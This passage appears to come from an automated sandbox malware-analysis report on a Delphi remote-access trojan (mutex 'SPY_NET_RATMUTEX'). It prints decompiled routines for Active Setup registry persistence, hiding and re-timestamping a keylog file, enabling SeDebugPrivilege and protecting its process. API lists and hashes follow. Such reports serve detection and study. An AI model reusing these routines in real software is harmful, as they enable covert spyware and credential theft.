                                    						return E240130AC( &_v124, 0xf);
                                    					} else {
                                    						E2402444C("[LogFile]\r\n", _t220,  &_v100, "njkvenknvjebcddlaknvfdvjkfdskv", _t301, _t303);
                                    						E240130DC(0x240637b0, _v100);
                                    						E24013344(0x240637b0, 0x24056828);
                                    						_t140 =  *0x2405ab24; // 0x240632f0
                                    						_t142 = E24016C78( *_t140, _t220, _t316); // executed
                                    						_t317 = _t142;
                                    						if(_t142 == 0) {
                                    							_t178 = E2401333C( *0x240637b0);
                                    							_t179 =  *0x2405ab24; // 0x240632f0
                                    							E24016DA0( *_t179, _t220, _t178,  *0x240637b0, _t303, _t317); // executed
                                    						}
                                    						_t143 =  *0x2405ab24; // 0x240632f0
                                    						E24016CE4( *_t143, _t220,  &_v104, 0x240637b8, _t301, _t303, _t317); // executed
                                    						E240130DC(0x240637b4, _v104);
                                    						while(1) {
                                    							_t318 =  *0x240637b4;
                                    							if( *0x240637b4 == 0) {
                                    								break;
                                    							}
                                    							E24013590( *0x240637b4, E24013674(0x24056828,  *0x240637b4) - 1, 1,  &_v112);
                                    							E2402444C(_v112, _t220,  &_v108, "njkvenknvjebcddlaknvfdvjkfdskv", _t301, _t303);
                                    							_t155 =  *0x2405ac00; // 0x240632f4
                                    							E24013344(_t155, _v108);
                                    							__eflags = E24013674(0x24056828,  *0x240637b4) - 1;
                                    							E240135D0(0x240637b4, E24013674(0x24056828,  *0x240637b4) - 1, 1);
                                    							E240135D0(0x240637b4, 4, 1);
                                    						}
                                    						_t164 =  *0x2405ab24; // 0x240632f0
                                    						SetFileAttributesA(E24013534( *_t164), 0x80);
                                    						_t168 =  *0x2405ab24; // 0x240632f0
                                    						E24017668( *_t168, _t220, _t318); // executed
                                    						_t171 =  *0x2405ab24; // 0x240632f0
                                    						SetFileAttributesA(E24013534( *_t171), 2); // executed
                                    						_t230 = 0;
                                    						_t176 = E240178C8(E2405251C, 0, 0);
                                    						_t290 =  *0x2405ac18; // 0x240570d8
                                    						 *_t290 = _t176;
                                    						goto L23;
                                    					}
                                    				}
                                    				_t298 =  *0x2405ac14; // 0x2405b94c
                                    				_t230 = "_PERSIST";
                                    				E24013388( &_v76, "_PERSIST",  *_t298);
                                    				_t206 = E24014F18(0, 0, E24013534(_v76));
                                    				_t300 =  *0x2405ac4c; // 0x2405b9a0
                                    				 *_t300 = _t206;
                                    				if(GetLastError() != 0xb7) {
                                    					E24055240(_t220, _t301, _t303);
                                    					goto L35;
                                    				} else {
                                    					_t209 =  *0x2405ac4c; // 0x2405b9a0
                                    					CloseHandle( *_t209);
                                    					goto L8;
                                    				}
                                    				L1:
                                    				_push(0);
                                    				_push(0);
                                    				_t222 = _t222 - 1;
                                    				_t307 = _t222;
                                    				if(_t222 != 0) {
                                    					goto L1;
                                    				} else {
                                    					_push(__ebx);
                                    					E24014DBC(0x24055ef0);
                                    					_t303 =  *0x2405ac24; // 0x2405b980
                                    					_push(_t305);
                                    					_push(0x24056746);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t306;
                                    					E24017038( &_v68);
                                    					E24013388(0x240637ac, "XX--XX--XX.txt", _v68);
                                    					E24016CE4( *0x240637ac, __ebx,  &_v72, 0x240637b8, __edi, _t303, _t307); // executed
                                    					E240130DC(0x240637b0, _v72);
                                    					_t43 =  *0x2405ab18; // 0x2405b97c
                                    					E24013590( *0x240637b0, E24013674(0x24056774,  *0x240637b0) - 1, 1, _t43);
                                    					E240135D0(0x240637b0, E24013674(0x24056774,  *0x240637b0), 1);
                                    					E24013590( *0x240637b0, E24013674(0x24056774,  *0x240637b0) - 1, 1, _t303);
                                    					_t230 = E24013674(0x24056774,  *0x240637b0);
                                    					E240135D0(0x240637b0, _t57, 1);
                                    					E24017BE0( *0x240637b0, __ebx, __edi, _t303, _t307); // executed
                                    					E24017DA8();
                                    					_t63 =  *0x2405ab8c; // 0x2405b8f4
                                    					if( *_t63 != 0) {
                                    						RegOpenKeyExA(0x80000001, "Software\\Microsoft\\Active Setup\\Installed Components\\", 0, 0x20006, 0x240637bc);
                                    						_t213 =  *0x2405ab8c; // 0x2405b8f4
                                    						RegDeleteKeyA( *0x240637bc, E24013534( *_t213)); // executed
                                    						RegCloseKey( *0x240637bc);
                                    					}
                                    					goto L4;
                                    				}
			}

                                    0x24056188
                                    0x24056188
                                    0x24056189
                                    0x2405618b
                                    0x2405618b
                                    0x240562d4
                                    0x240562d4
                                    0x240562dc
                                    0x24056332
                                    0x2405633d
                                    0x24056342
                                    0x24056353
                                    0x24056358
                                    0x2405635e
                                    0x2405636a
                                    0x2405636e
                                    0x2405636e
                                    0x24056385
                                    0x2405639c
                                    0x240563a1
                                    0x240563a9
                                    0x240563b0
                                    0x240563ba
                                    0x240563bf
                                    0x240563c3
                                    0x240563cd
                                    0x240563d5
                                    0x240563d5
                                    0x240563bf
                                    0x240563da
                                    0x240563e2
                                    0x240563e9
                                    0x240563f3
                                    0x240563f8
                                    0x240563fc
                                    0x24056406
                                    0x2405640e
                                    0x2405640e
                                    0x240563f8
                                    0x24056418
                                    0x2405641d
                                    0x24056425
                                    0x2405642a
                                    0x2405642d
                                    0x24056432
                                    0x24056441
                                    0x24056446
                                    0x2405644b
                                    0x2405644e
                                    0x240565ab
                                    0x240565ab
                                    0x240565b2
                                    0x240565b9
                                    0x240565c1
                                    0x240565c6
                                    0x240565cb
                                    0x240565d3
                                    0x240565da
                                    0x240565de
                                    0x240565de
                                    0x240565e3
                                    0x240565eb
                                    0x240565f2
                                    0x240565f6
                                    0x240565f6
                                    0x240565fb
                                    0x24056602
                                    0x24056604
                                    0x24056609
                                    0x24056612
                                    0x24056617
                                    0x2405661a
                                    0x2405661f
                                    0x2405662e
                                    0x24056633
                                    0x24056638
                                    0x2405663b
                                    0x2405663d
                                    0x2405664e
                                    0x24056666
                                    0x24056674
                                    0x24056679
                                    0x2405667f
                                    0x2405668a
                                    0x2405668a
                                    0x24056698
                                    0x240566a6
                                    0x240566b4
                                    0x240566b9
                                    0x240566bd
                                    0x240566c4
                                    0x240566dc
                                    0x240566e4
                                    0x240566eb
                                    0x240566f1
                                    0x240566f1
                                    0x240566e4
                                    0x240566fd
                                    0x240566fd
                                    0x24056705
                                    0x00000000
                                    0x00000000
                                    0x240566f8
                                    0x240566f8
                                    0x24056707
                                    0x2405670f
                                    0x24056714
                                    0x2405671c
                                    0x24056726
                                    0x2405672b
                                    0x2405672d
                                    0x24056730
                                    0x24056733
                                    0x24056745
                                    0x24056454
                                    0x24056461
                                    0x2405646e
                                    0x2405647d
                                    0x24056482
                                    0x24056489
                                    0x2405648e
                                    0x24056490
                                    0x24056497
                                    0x2405649e
                                    0x240564ab
                                    0x240564ab
                                    0x240564b8
                                    0x240564bf
                                    0x240564cc
                                    0x24056551
                                    0x24056551
                                    0x24056558
                                    0x00000000
                                    0x00000000
                                    0x240564f4
                                    0x24056504
                                    0x2405650c
                                    0x24056511
                                    0x2405652d
                                    0x24056538
                                    0x2405654c
                                    0x2405654c
                                    0x24056563
                                    0x24056570
                                    0x24056575
                                    0x2405657c
                                    0x24056583
                                    0x24056590
                                    0x2405659a
                                    0x2405659e
                                    0x240565a3
                                    0x240565a9
                                    0x00000000
                                    0x240565a9
                                    0x2405644e
                                    0x240562de
                                    0x240562e9
                                    0x240562ee
                                    0x24056300
                                    0x24056305
                                    0x2405630b
                                    0x24056317
                                    0x24056328
                                    0x00000000
                                    0x24056319
                                    0x24056319
                                    0x24056321
                                    0x00000000
                                    0x24056321
                                    0x24056190
                                    0x24056190
                                    0x24056192
                                    0x24056194
                                    0x24056194
                                    0x24056195
                                    0x00000000
                                    0x24056197
                                    0x24056197
                                    0x2405619e
                                    0x240561a3
                                    0x240561ab
                                    0x240561ac
                                    0x240561b1
                                    0x240561b4
                                    0x240561ba
                                    0x240561cc
                                    0x240561de
                                    0x240561eb
                                    0x240561f0
                                    0x24056213
                                    0x24056234
                                    0x24056257
                                    0x2405626c
                                    0x24056278
                                    0x24056282
                                    0x24056287
                                    0x2405628c
                                    0x24056294
                                    0x240562ac
                                    0x240562b1
                                    0x240562c4
                                    0x240562cf
                                    0x240562cf
                                    0x00000000
                                    0x24056294

                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,240637BC,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 240562AC
                                    • RegDeleteKeyA.ADVAPI32(?,00000000), ref: 240562C4
                                    • RegCloseKey.ADVAPI32(?,?,00000000,80000001,Software\Microsoft\Active Setup\Installed Components\,00000000,00020006,240637BC,2405B980,2405B97C,00000000,24056746,?,?,?,00000000), ref: 240562CF
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 2405630D
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 24056321
                                    • DeleteFileA.KERNEL32(00000000,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 2405633D
                                      • Part of subcall function 24014F18: CreateMutexA.KERNEL32(?,?,?,?,24038D32,00000000,00000000,00000000,00000000,?,00001388,?,24038DFC,?,24038DFC,?), ref: 24014F2E
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 24056360
                                    • ExitProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,2405B980,2405B97C,00000000,24056746,?,?,?,00000000,00000000), ref: 2405636E
                                    • CreateThread.KERNEL32(00000000,00000000,Function_00044C04,00000000,00000000,240637B8), ref: 24056385
                                    • CreateThread.KERNEL32(00000000,00000000,Function_000451BC,00000000,00000000,240637B8), ref: 2405639C
                                    • GetCurrentProcessId.KERNEL32(00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000,Function_00044C04,00000000,00000000,240637B8,00000000,00000000,00000000,00000000), ref: 24056413
                                    • SetFileAttributesA.KERNEL32(00000000,00000080,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000,Function_00044C04,00000000), ref: 24056570
                                      • Part of subcall function 24017668: CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176C7
                                      • Part of subcall function 24017668: SetFileTime.KERNEL32(00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176DC
                                      • Part of subcall function 24017668: SetFileTime.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000), ref: 240176EA
                                      • Part of subcall function 24017668: SetFileTime.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000,00000000,40000000,00000001,00000000), ref: 240176F8
                                      • Part of subcall function 24017668: CloseHandle.KERNEL32(00000000,00000000,40000000,00000001,00000000,00000003,02000000,00000000,00000000,24017719), ref: 240176FE
                                    • GetCurrentProcessId.KERNEL32(SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000,Function_00044C04,00000000), ref: 24056642
                                    • SetFileAttributesA.KERNEL32(00000000,00000002,00000000,00000080,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000), ref: 24056590
                                      • Part of subcall function 240178C8: CreateThread.KERNEL32(00000000,00000000,Function_00042464,00000000,00000000), ref: 240178D6
                                      • Part of subcall function 240178C8: SetThreadPriority.KERNEL32(00000000,00000000,00000000,?,?,24052534), ref: 240178DF
                                    • Sleep.KERNEL32(000003E8,00000001,00000000,00000000,00000000,00000000,_x_X_PASSWORDLIST_X_x_,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC), ref: 240566EB
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000001,00000000,00000000,00000000,00000000,_x_X_PASSWORDLIST_X_x_,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000), ref: 240566F1
                                    • CloseHandle.KERNEL32(0000044C,00000000,00000000,_x_X_PASSWORDLIST_X_x_,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000,00000000,240637B8), ref: 2405670F
                                    • CloseHandle.KERNEL32(00000000,0000044C,00000000,00000000,_x_X_PASSWORDLIST_X_x_,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000,00000000), ref: 2405671C
                                    • Sleep.KERNEL32(00002EE0,00000000,0000044C,00000000,00000000,_x_X_PASSWORDLIST_X_x_,SQLite3.dll,240567CC,?,logs.dat,240567CC,?,00000000,00000000,Function_000451BC,00000000), ref: 24056726
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: File$Close$CreateHandle$Thread$ProcessTime$AttributesCurrentDeleteErrorLastSleep$ExitMutexOpenPriority
                                    • String ID: ####$PIDprocess$SOFTWARE\Microsoft\$SPY_NET_RATMUTEX$SQLite3.dll$Software\Microsoft\Active Setup\Installed Components\$XX--XX--XX.txt$[LogFile]$_PERSIST$_x_X_PASSWORDLIST_X_x_$logs.dat$njkvenknvjebcddlaknvfdvjkfdskv$open
                                    • API String ID: 2216801884-1096289745
                                    • Opcode ID: 2dbb1c664eee7f2a464c9adabf973a8edcffe0a5fb58d2e5190f5055ab857515
                                    • Instruction ID: 0eaa4b80a5128c934de95406a7d1a7ebec328d36d32247c2767844105b25d022
                                    • Opcode Fuzzy Hash: 2dbb1c664eee7f2a464c9adabf973a8edcffe0a5fb58d2e5190f5055ab857515
                                    • Instruction Fuzzy Hash: 11E13C747442049BFB11DFA8C890F5D77E5FB65708F508824B40AAB3A9CAB8EDC58B91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 64%
                                    			E240147A8(intOrPtr __eax) {
                                    				intOrPtr _v8;
                                    				void* _v12;
                                    				char _v15;
                                    				char _v17;
                                    				char _v18;
                                    				char _v22;
                                    				int _v28;
                                    				char _v289;
                                    				long _t44;
                                    				long _t61;
                                    				long _t63;
                                    				CHAR* _t70;
                                    				CHAR* _t72;
                                    				char* _t94;
                                    				void* _t95;
                                    				intOrPtr _t99;
                                    				struct HINSTANCE__* _t107;
                                    				void* _t110;
                                    				void* _t112;
                                    				intOrPtr _t113;
                                    
                                    				_t110 = _t112;
                                    				_t113 = _t112 + 0xfffffee0;
                                    				_v8 = __eax;
                                    				GetModuleFileNameA(0,  &_v289, 0x105);
                                    				_v22 = 0;
                                    				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                    				if(_t44 == 0) {
                                    					L3:
                                    					_push(_t110);
                                    					_push(0x240148ad);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t113;
                                    					_v28 = 5;
                                    					E240145F0( &_v289, 0x105);
                                    					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, 0x24014a14, 0, 0,  &_v22,  &_v28) != 0) {
                                    						_v22 = 0;
                                    					}
                                    					_v18 = 0;
                                    					_pop(_t99);
                                    					 *[fs:eax] = _t99;
                                    					_push(0x240148b4);
                                    					return RegCloseKey(_v12);
                                    				} else {
                                    					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
                                    					if(_t61 == 0) {
                                    						goto L3;
                                    					} else {
                                    						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
                                    						if(_t63 != 0) {
                                    							_push(0x105);
                                    							_push(_v8);
                                    							_push( &_v289);
                                    							L2401128C();
                                    							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5);
                                    							_t107 = 0;
                                    							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
                                    								_t70 =  &_v289;
                                    								_push(_t70);
                                    								L24011294();
                                    								_t94 = _t70 +  &_v289;
                                    								while( *_t94 != 0x2e && _t94 !=  &_v289) {
                                    									_t94 = _t94 - 1;
                                    								}
                                    								_t72 =  &_v289;
                                    								if(_t94 != _t72) {
                                    									_t95 = _t94 + 1;
                                    									if(_v22 != 0) {
                                    										_push(0x105 - _t95 - _t72);
                                    										_push( &_v22);
                                    										_push(_t95);
                                    										L2401128C();
                                    										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                    									}
                                    									if(_t107 == 0 && _v17 != 0) {
                                    										_push(0x105 - _t95 -  &_v289);
                                    										_push( &_v17);
                                    										_push(_t95);
                                    										L2401128C();
                                    										_t107 = LoadLibraryExA( &_v289, 0, 2);
                                    										if(_t107 == 0) {
                                    											_v15 = 0;
                                    											_push(0x105 - _t95 -  &_v289);
                                    											_push( &_v17);
                                    											_push(_t95);
                                    											L2401128C();
                                    											_t107 = LoadLibraryExA( &_v289, 0, 2);
                                    										}
                                    									}
                                    								}
                                    							}
                                    							return _t107;
                                    						} else {
                                    							goto L3;
                                    						}
                                    					}
                                    				}
                                    			}

                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 240147C4
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 240147E2
                                    • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 24014800
                                    • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 2401481E
                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,240148AD,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 24014867
                                    • RegQueryValueExA.ADVAPI32(?,24014A14,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,240148AD,?,80000001), ref: 24014885
                                    • RegCloseKey.ADVAPI32(?,240148B4,00000000,00000000,00000005,00000000,240148AD,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 240148A7
                                    • lstrcpyn.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 240148C4
                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 240148D1
                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 240148D7
                                    • lstrlen.KERNEL32(00000000), ref: 24014902
                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 24014949
                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 24014959
                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000), ref: 24014981
                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 24014991
                                    • lstrcpyn.KERNEL32(00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 240149B7
                                    • LoadLibraryExA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000105,00000000,00000000,00000002,00000000,00000000,00000105,00000000), ref: 240149C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                    • String ID: .$Software\Borland\Delphi\Locales$Software\Borland\Locales
                                    • API String ID: 1759228003-3917250287
                                    • Opcode ID: 42ee46547e8e3106cdda034bdc12a7bc57c1386e361a9b44a7258d1f1ec7aaf0
                                    • Instruction ID: 39d68f2d681f84a836ab47e9db7d39d4e42c15480b0cf85e97f51f47611cafd5
                                    • Opcode Fuzzy Hash: 42ee46547e8e3106cdda034bdc12a7bc57c1386e361a9b44a7258d1f1ec7aaf0
                                    • Instruction Fuzzy Hash: 57516375A0025C7AFB16C6A4CC85FEF7BEC9B08744F4001B1EA08E7195EA749FD48BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 82%
                                    			E24015B30() {
                                    				void* _v8;
                                    				long _v12;
                                    				intOrPtr _v16;
                                    				struct _TOKEN_PRIVILEGES _v28;
                                    				struct _OSVERSIONINFOA _v176;
                                    				int _t20;
                                    				intOrPtr _t42;
                                    				intOrPtr _t44;
                                    
                                    				_v176.dwOSVersionInfoSize = 0x94;
                                    				_t20 = GetVersionExA( &_v176);
                                    				if(_v176.dwPlatformId != 1) {
                                    					_push(0x24015bf5);
                                    					_push( *[fs:eax]);
                                    					 *[fs:eax] = _t44;
                                    					OpenProcessToken(GetCurrentProcess(), 0x20,  &_v8);
                                    					LookupPrivilegeValueA(0, "SeDebugPrivilege",  &(_v28.Privileges)); // executed
                                    					_v28.PrivilegeCount = 1;
                                    					_v16 = 2;
                                    					_v12 = 0;
                                    					AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0,  &_v12); // executed
                                    					_v28.PrivilegeCount = 1;
                                    					_v16 = 2;
                                    					_v12 = 0;
                                    					AdjustTokenPrivileges(_v8, 0,  &_v28, 0, 0,  &_v12); // executed
                                    					CloseHandle(_v8); // executed
                                    					_pop(_t42);
                                    					 *[fs:eax] = _t42;
                                    					return 0;
                                    				}
                                    				return _t20;
                                    			}

                                    0x24015b3c
                                    0x24015b4d
                                    0x24015b59
                                    0x24015b62
                                    0x24015b67
                                    0x24015b6a
                                    0x24015b79
                                    0x24015b8c
                                    0x24015b91
                                    0x24015b98
                                    0x24015ba1
                                    0x24015bb6
                                    0x24015bbb
                                    0x24015bc2
                                    0x24015bcb
                                    0x24015bdd
                                    0x24015be6
                                    0x24015bed
                                    0x24015bf0
                                    0x00000000
                                    0x24015bf0
                                    0x24015c05

                                    APIs
                                    • GetVersionExA.KERNEL32(00000094), ref: 24015B4D
                                    • GetCurrentProcess.KERNEL32(00000020,?,00000000,24015BF5,?,00000094), ref: 24015B73
                                    • OpenProcessToken.ADVAPI32(00000000,00000020,?,00000000,24015BF5,?,00000094), ref: 24015B79
                                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 24015B8C
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,?,00000000,00000020,?,00000000,24015BF5,?,00000094), ref: 24015BB6
                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000001,00000000,00000000,?,?,00000000,00000001,00000000,00000000,?,00000000,00000020,?,00000000), ref: 24015BDD
                                    • CloseHandle.KERNEL32(?,?,00000000,00000001,00000000,00000000,?,?,00000000,00000001,00000000,00000000,?,00000000,00000020,?), ref: 24015BE6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Token$AdjustPrivilegesProcess$CloseCurrentHandleLookupOpenPrivilegeValueVersion
                                    • String ID: SeDebugPrivilege
                                    • API String ID: 3222167619-2896544425
                                    • Opcode ID: a35bb3253e17ea2b179d723f62c4cbad68b68514c7fb13b5cc00fa9772f1d2ee
                                    • Instruction ID: 8e8d645fc21ffc544d601c472f01e925885e8c008af4b5905e0ef5136aaf7002
                                    • Opcode Fuzzy Hash: a35bb3253e17ea2b179d723f62c4cbad68b68514c7fb13b5cc00fa9772f1d2ee
                                    • Instruction Fuzzy Hash: 492103B1A00208FEFB10CBE5DD95FEFBBFCEB05704F504466E608E6190D6755A848BA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E24015C1C(long __eax, void* __ecx) {
                                    				void _v12;
                                    				void _v28;
                                    				long _t9;
                                    				long _t11;
                                    				signed int _t13;
                                    				void* _t16;
                                    
                                    				_t13 = 0;
                                    				_t16 = OpenProcess(0x1f0fff, 0, __eax);
                                    				if(_t16 != 0) {
                                    					_t9 = NtQueryInformationProcess(_t16, 0x16,  &_v12, 4, 0); // executed
                                    					if(_t9 < 0xc0000000) {
                                    						_v28 = _v28 | 0x00000002;
                                    						_v28 = _v28 | 0x00000008;
                                    						_t11 = NtSetInformationProcess(_t16, 0x16,  &_v28, 4); // executed
                                    						_t13 = 0 | _t11 - 0xc0000000 > 0x00000000;
                                    						CloseHandle(_t16); // executed
                                    					}
                                    				}
                                    				return _t13;
                                    			}


                                    0x24015c1f
                                    0x24015c2e
                                    0x24015c32
                                    0x24015c40
                                    0x24015c4a
                                    0x24015c4c
                                    0x24015c50
                                    0x24015c5e
                                    0x24015c68
                                    0x24015c6c
                                    0x24015c6c
                                    0x24015c4a
                                    0x24015c76

                                    APIs
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,?,2405B980,?,2405641D,00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000,Function_00044C04), ref: 24015C29
                                    • NtQueryInformationProcess.NTDLL(00000000,00000016,?,00000004,00000000), ref: 24015C40
                                    • NtSetInformationProcess.NTDLL(00000000,00000016,?,00000004), ref: 24015C5E
                                    • CloseHandle.KERNEL32(00000000,001F0FFF,00000000,00000000,?,2405B980,?,2405641D,00000000,00000000,Function_000451BC,00000000,00000000,240637B8,00000000,00000000), ref: 24015C6C
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Process$Information$CloseHandleOpenQuery
                                    • String ID:
                                    • API String ID: 1636144130-0
                                    • Opcode ID: 8b0411576a1d48e6dbe04b4ade3104a22fdf87d3cfc7ab914bc7621fac0affc4
                                    • Instruction ID: 4a51a8b0da8681afbabb24b4b71017c90dbcf40be87158323073c3001d2d2b82
                                    • Opcode Fuzzy Hash: 8b0411576a1d48e6dbe04b4ade3104a22fdf87d3cfc7ab914bc7621fac0affc4
                                    • Instruction Fuzzy Hash: A2F0A0722C63143EF32159504C82FAF268C9F46BA8F400529F744DA080C2549AC842A6
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 55%
                                    			E24016C77(char __eax, void* __ebx, void* __edx) {
                                    				char _v8;
                                    				intOrPtr _v117;
                                    				struct _WIN32_FIND_DATAA _v328;
                                    				void* _t15;
                                    				intOrPtr _t26;
                                    				void* _t29;
                                    
                                    				_v117 = _v117 + __edx;
                                    				_v8 = __eax;
                                    				E24013524(_v8);
                                    				_push(_t29);
                                    				_push(0x24016cd5);
                                    				_push( *[fs:eax]);
                                    				 *[fs:eax] = _t29 + 0xfffffebc;
                                    				_t15 = FindFirstFileA(E24013534(_v8),  &_v328); // executed
                                    				if(_t15 != 0xffffffff) {
                                    					FindClose(_t15); // executed
                                    				}
                                    				_pop(_t26);
                                    				 *[fs:eax] = _t26;
                                    				_push(E24016CDC);
                                    				return E24013088( &_v8);
                                    			}


                                    0x24016c77
                                    0x24016c82
                                    0x24016c88
                                    0x24016c8f
                                    0x24016c90
                                    0x24016c95
                                    0x24016c98
                                    0x24016cad
                                    0x24016cb5
                                    0x24016cb8
                                    0x24016cbd
                                    0x24016cc1
                                    0x24016cc4
                                    0x24016cc7
                                    0x24016cd4

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CAD
                                    • FindClose.KERNEL32(00000000,00000000,?,00000000,24016CD5,?,2405B97C,?,24016662,00000000,240166D3,?,?,?,2405B97C), ref: 24016CB8
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.652344852.0000000024010000.00000040.00000001.sdmp, Offset: 24010000, based on PE: true
                                    • Associated: 00000014.00000002.652438839.0000000024064000.00000040.00000001.sdmp
                                    • Associated: 00000014.00000002.652465230.000000002406B000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFileFirst
                                    • String ID:
                                    • API String ID: 2295610775-0
                                    • Opcode ID: de3c709328871596a5b821b1a49aa237f6efc18f58b709d848d978373845b7ee
                                    • Instruction ID: 247e38473cecc72c6f9aff3f6e8617c1847afe5eee7a8d1161aac130ffc18d49
